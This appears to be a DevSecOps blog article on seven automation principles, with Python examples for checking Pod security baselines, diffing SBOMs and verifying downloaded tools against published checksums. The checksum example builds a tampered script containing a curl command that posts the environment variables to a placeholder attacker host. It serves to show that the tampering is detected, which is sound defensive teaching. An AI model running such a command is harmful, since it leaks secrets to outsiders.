DevSecOps automation is one of the most significant benefits of shifting security left in your development process. The aftermath of the SolarWinds and Codecov breaches should be top of mind if your organization is contemplating a move to DevSecOps.
To keep its processes efficient, DevSecOps relies on automation, which lets developers, infrastructure, and information security teams focus on delivering value instead of making mistakes or repeating routine tasks. Let's look at 7 DevSecOps principles that guide automation.
1. Acknowledge that DevSecOps Automation drives DevOps Transformation
Pivoting your DevOps processes to DevSecOps is a transformative effort. You're doing more than automating some sundry manual tasks. Being strategic with automation means you can change the way your teams work, for the better. It frees developers and sysadmins to do the more strategic or billable work that sat on the backlog because routine development and operations tasks consumed their working hours.
Project managers should include the potential impact of automation in their technology and staffing plans. While automation makes business sense, those benefits may not be felt right away by a development team already stressed by nearly two years of pandemic-enforced remote work.
2. Implement Orchestration for Containers
Use Kubernetes or another container orchestration platform to apply, provision, and enforce repeatable security baselines as code (non-root containers, read-only root filesystems, dropped capabilities, pinned images, resource limits) rather than by hand, one container at a time. Approach your move to container orchestration systematically: start small with one project, take your lessons learned, and then expand orchestration throughout your cloud-native projects where it makes technology and business sense.
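One way to make such a baseline repeatable is to check every Pod manifest against it before it is admitted. The following is an added example, not code from the original article or from any Kubernetes project: the two manifests are constructed for illustration, and the rule set is one reasonable hardening baseline rather than an official standard. In production the same rules would be enforced by Pod Security Admission or a policy engine such as Gatekeeper or Kyverno; the script shows what those policies actually check.

```python
"""Baseline check for a Kubernetes Pod manifest, in the style of an admission
policy. Added example: the manifests are constructed for illustration and the
rule set is one reasonable hardening baseline, not an official Kubernetes
standard."""
import json


def _effective(pod_ctx: dict, ctr_ctx: dict, key: str, default):
    """Container-level securityContext overrides the pod-level setting."""
    return ctr_ctx[key] if key in ctr_ctx else pod_ctx.get(key, default)


def _image_is_pinned(image: str) -> bool:
    """True if the image is referenced by digest or by a tag other than 'latest'."""
    if "@sha256:" in image:
        return True
    last = image.rsplit("/", 1)[-1]          # strip registry/namespace (may contain ':port')
    tag = last.split(":", 1)[1] if ":" in last else ""
    return tag not in ("", "latest")


def check_pod(manifest: dict) -> list:
    """Return baseline violations for one Pod; an empty list means compliant."""
    findings = []
    spec = manifest.get("spec", {})
    pod_ctx = spec.get("securityContext", {})
    pod = manifest.get("metadata", {}).get("name", "<unnamed>")

    # Sharing host namespaces defeats container isolation entirely
    for field in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(field):
            findings.append(f"{pod}: {field} is enabled")

    for c in spec.get("containers", []) + spec.get("initContainers", []):
        who = f"{pod}/{c.get('name', '<unnamed>')}"
        ctx = c.get("securityContext", {})
        if not _image_is_pinned(c.get("image", "")):
            findings.append(f"{who}: image is not pinned to a tag or digest")
        if ctx.get("privileged"):
            findings.append(f"{who}: privileged container")
        if not _effective(pod_ctx, ctx, "runAsNonRoot", False):
            findings.append(f"{who}: runAsNonRoot is not set")
        if ctx.get("allowPrivilegeEscalation", True):   # Kubernetes default is true
            findings.append(f"{who}: allowPrivilegeEscalation is not disabled")
        if not ctx.get("readOnlyRootFilesystem", False):
            findings.append(f"{who}: root filesystem is writable")
        drops = {d.upper() for d in ctx.get("capabilities", {}).get("drop", [])}
        if "ALL" not in drops:
            findings.append(f"{who}: capabilities are not dropped (expected drop: [ALL])")
        limits = c.get("resources", {}).get("limits", {})
        if "cpu" not in limits or "memory" not in limits:
            findings.append(f"{who}: cpu/memory limits are missing")
    return findings


# Constructed manifests (JSON is accepted by kubectl just like YAML).
WEAK_POD = json.loads("""
{"apiVersion": "v1", "kind": "Pod",
 "metadata": {"name": "web-weak"},
 "spec": {"hostNetwork": true,
          "containers": [{"name": "web", "image": "nginx:latest"}]}}
""")

# The digest below is a placeholder, not a real nginx image digest.
HARDENED_POD = json.loads("""
{"apiVersion": "v1", "kind": "Pod",
 "metadata": {"name": "web-hardened"},
 "spec": {"securityContext": {"runAsNonRoot": true, "runAsUser": 10001},
          "containers": [{
             "name": "web",
             "image": "nginx@sha256:0000000000000000000000000000000000000000000000000000000000000000",
             "securityContext": {"allowPrivilegeEscalation": false,
                                 "readOnlyRootFilesystem": true,
                                 "capabilities": {"drop": ["ALL"]}},
             "resources": {"limits": {"cpu": "500m", "memory": "256Mi"}}}]}}
""")

if __name__ == "__main__":
    for m in (WEAK_POD, HARDENED_POD):
        print(m["metadata"]["name"], check_pod(m) or "OK")
```

The weak manifest produces seven findings and the hardened one none; wiring `check_pod` into a CI step that fails on a non-empty list gives you the "repeatable best practice" the orchestration layer is supposed to deliver.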
3. Institute an SBOM to enhance your Application Inventory
The SolarWinds and Codecov breaches, followed by President Biden's Executive Order on Improving the Nation's Cybersecurity (EO 14028), testify to the growing importance of the software bill of materials (SBOM) in cybersecurity.
Bringing SBOM generation into your DevSecOps pipeline with automated scanning tools, emitting a standard format such as SPDX or CycloneDX, gives you the best picture of the proprietary and open source software (OSS) dependencies in the software your teams are developing. With the right tools and processes in place you can also track SBOM drift: comparing the SBOM from one build against the last reviewed one. This visibility through your development lifecycle shows where your software gains additional components and dependencies, malicious or otherwise.
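The drift check described above, as an added example that is not part of the original article or of any SBOM tool: two minimal CycloneDX JSON documents are constructed inline to stand in for the output of a scanner such as syft or cyclonedx-cli, and the diff reports what was added, removed, or re-versioned between a reviewed baseline and the current build. The allowlist helper and its "name@version" convention are this example's own design, not a CycloneDX feature.

```python
"""SBOM drift between two pipeline runs. Added example: the two CycloneDX
documents below are constructed for illustration (minimal JSON, not real tool
output); the diff works on any CycloneDX JSON that lists 'components' with a
name and version."""
import json


def _key(component: dict) -> tuple:
    """Identity of a component across versions: (type, group, name)."""
    return (component.get("type", ""), component.get("group", ""), component["name"])


def _name(component: dict) -> str:
    group = component.get("group")
    return f"{group}/{component['name']}" if group else component["name"]


def diff_sboms(baseline: dict, current: dict) -> dict:
    """Return components added, removed, or re-versioned since the baseline."""
    base = {_key(c): c for c in baseline.get("components", [])}
    curr = {_key(c): c for c in current.get("components", [])}
    added = sorted(f"{_name(curr[k])}@{curr[k].get('version', '?')}"
                   for k in curr.keys() - base.keys())
    removed = sorted(f"{_name(base[k])}@{base[k].get('version', '?')}"
                     for k in base.keys() - curr.keys())
    changed = sorted(
        (_name(base[k]), base[k].get("version"), curr[k].get("version"))
        for k in base.keys() & curr.keys()
        if base[k].get("version") != curr[k].get("version")
    )
    return {"added": added, "removed": removed, "changed": changed}


def unreviewed_additions(drift: dict, approved: set) -> list:
    """Additions not on the reviewed allowlist; a non-empty list should fail the build.
    Approvals are 'name@version' strings, so approving a package once does not
    approve every later version of it."""
    return [a for a in drift["added"] if a not in approved]


# Constructed sample SBOMs: the baseline is the last reviewed build,
# the current one is what the pipeline just produced.
BASELINE_SBOM = json.loads("""
{"bomFormat": "CycloneDX", "specVersion": "1.4", "components": [
  {"type": "library", "name": "lodash", "version": "4.17.20", "purl": "pkg:npm/lodash@4.17.20"},
  {"type": "library", "name": "express", "version": "4.18.1", "purl": "pkg:npm/express@4.18.1"},
  {"type": "library", "group": "@types", "name": "node", "version": "18.0.0"}
]}""")

CURRENT_SBOM = json.loads("""
{"bomFormat": "CycloneDX", "specVersion": "1.4", "components": [
  {"type": "library", "name": "lodash", "version": "4.17.21", "purl": "pkg:npm/lodash@4.17.21"},
  {"type": "library", "name": "express", "version": "4.18.1", "purl": "pkg:npm/express@4.18.1"},
  {"type": "library", "name": "event-stream", "version": "3.3.6", "purl": "pkg:npm/event-stream@3.3.6"}
]}""")

if __name__ == "__main__":
    drift = diff_sboms(BASELINE_SBOM, CURRENT_SBOM)
    print(json.dumps(drift, indent=2))
    print("unreviewed:", unreviewed_additions(drift, approved=set()))
```

Run against the samples, the diff reports `event-stream@3.3.6` as added, `@types/node@18.0.0` as removed, and `lodash` moving from 4.17.20 to 4.17.21. A pipeline gate that fails on any unreviewed addition is what turns "we have an SBOM" into drift detection.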
4. Build and Manage Secure Dev Environments & Toolchains
To support DevSecOps automation, your development environments need security standards and guidelines built into the integrated development environment (IDE) developers already use. Make the guidelines actionable and relevant with preconfigured containers or code examples. Back your policies with a developer onboarding program that trains new employees in your environments, tools, and processes, and offer refresher courses and ongoing training beyond onboarding.
Treat your toolchain (build agents, CI/CD runners, package mirrors, and the scripts and binaries your pipeline downloads) as endpoints on the same footing as any other in your enterprise, to protect against "man in the middle" tampering and other potential exploits. Securing your DevSecOps toolchain needs to be a continuing focus with participation from your developers, operations, and cybersecurity teams.
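One concrete toolchain control is to refuse to execute a fetched pipeline script or binary until it matches the checksum the vendor published. The following is an added example, not code from the original article or from any vendor: the release bytes, the tampered copy, and the checksum file are all constructed in memory so it runs offline, and the vendor-side `build_sha256sums` helper exists only to produce that file here (a real pipeline fetches the SHA256SUMS file from the vendor over TLS and pins or signature-verifies it). The `<hex>  <filename>` line format is the one `sha256sum(1)` emits.

```python
"""Verify a downloaded pipeline tool against its published SHA256SUMS before
executing it. Added example: the release bytes and the tampered copy are
constructed; the vendor-side helper is here only so the example runs offline."""
import hashlib
import hmac


def build_sha256sums(files: dict) -> str:
    """Vendor side: produce a SHA256SUMS file for a set of release artifacts."""
    return "".join(f"{hashlib.sha256(data).hexdigest()}  {name}\n"
                   for name, data in sorted(files.items()))


def parse_sha256sums(text: str) -> dict:
    """Consumer side: map filename -> expected hex digest.

    Accepts both '<hex>  <name>' and the binary-mode '<hex> *<name>' forms,
    skips blank and comment lines, and rejects anything else outright."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(maxsplit=1)
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError(f"malformed SHA256SUMS line: {line!r}")
        sums[parts[1].lstrip("*")] = parts[0].lower()
    return sums


def verify_download(name: str, data: bytes, sums_text: str) -> bool:
    """True only if the artifact's digest matches the published one.

    An artifact that is not listed at all is treated as unverifiable and
    rejected; a constant-time compare avoids leaking how much of the digest
    matched, which is cheap insurance even though the digest is public."""
    expected = parse_sha256sums(sums_text).get(name)
    if expected is None:
        return False
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected)


# Constructed release: a tiny uploader script a CI job might curl and run.
RELEASE = {
    "uploader.sh": b"#!/bin/sh\ncurl -sS https://vendor.example/report -d @coverage.xml\n",
}
PUBLISHED_SUMS = build_sha256sums(RELEASE)            # what the vendor would publish
TAMPERED = RELEASE["uploader.sh"] + b"curl -sS https://evil.example/collect -d \"$(env)\"\n"

if __name__ == "__main__":
    print("genuine :", verify_download("uploader.sh", RELEASE["uploader.sh"], PUBLISHED_SUMS))
    print("tampered:", verify_download("uploader.sh", TAMPERED, PUBLISHED_SUMS))
```

The genuine bytes verify and the tampered copy does not; the pipeline step should only `sh uploader.sh` after `verify_download` returns true, and should treat a missing or unparseable SHA256SUMS as a failure rather than a warning.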
5. Design Efficient Code Review Processes
Define the code review process to make reviews more efficient and consistent, saving developers and stakeholders valuable time. Be prepared to iterate with your developers, project management, and stakeholders to reach the level of efficiency they require. You do this by taking in lessons learned, documenting your code review process, and keeping a feedback mechanism in place to foster continuous improvement. An example of a feedback mechanism is a dedicated Slack channel.
6. Automate Security Testing
As part of your move to DevSecOps automation, analyze the current state of your security testing and look for tests you can automate alongside your existing functional tests, so that security checks become part of automated regression testing rather than a separate, manual gate.
Revisit QA team roles during security testing, then adjust your processes to put QA team members freed up by security test automation on more strategic tasks. An example of more strategic work is involving them more deeply in the remediation of QA issues alongside their counterparts on the development team.
7. Stick to (and Reinforce) Cloud Security Basics
Tried-and-true cloud security basics are at the heart of DevSecOps automation. Your cloud security team needs to work with your development and operations teams to apply the appropriate cloud security controls to your DevSecOps environments. Examples of the provider-native tooling involved include AWS Security Hub, Microsoft Azure Monitor, and Google Cloud Policy Intelligence.
Success with DevSecOps automation happens when you first acknowledge the role of automation in your digital transformation and then build automation into your existing DevOps processes. All the while, include your developers, system administrators, and QA team in the implementation of automation as it moves forward. DevSecOps truly is a team sport, and when approached with intention and purpose it can reap great rewards for the team.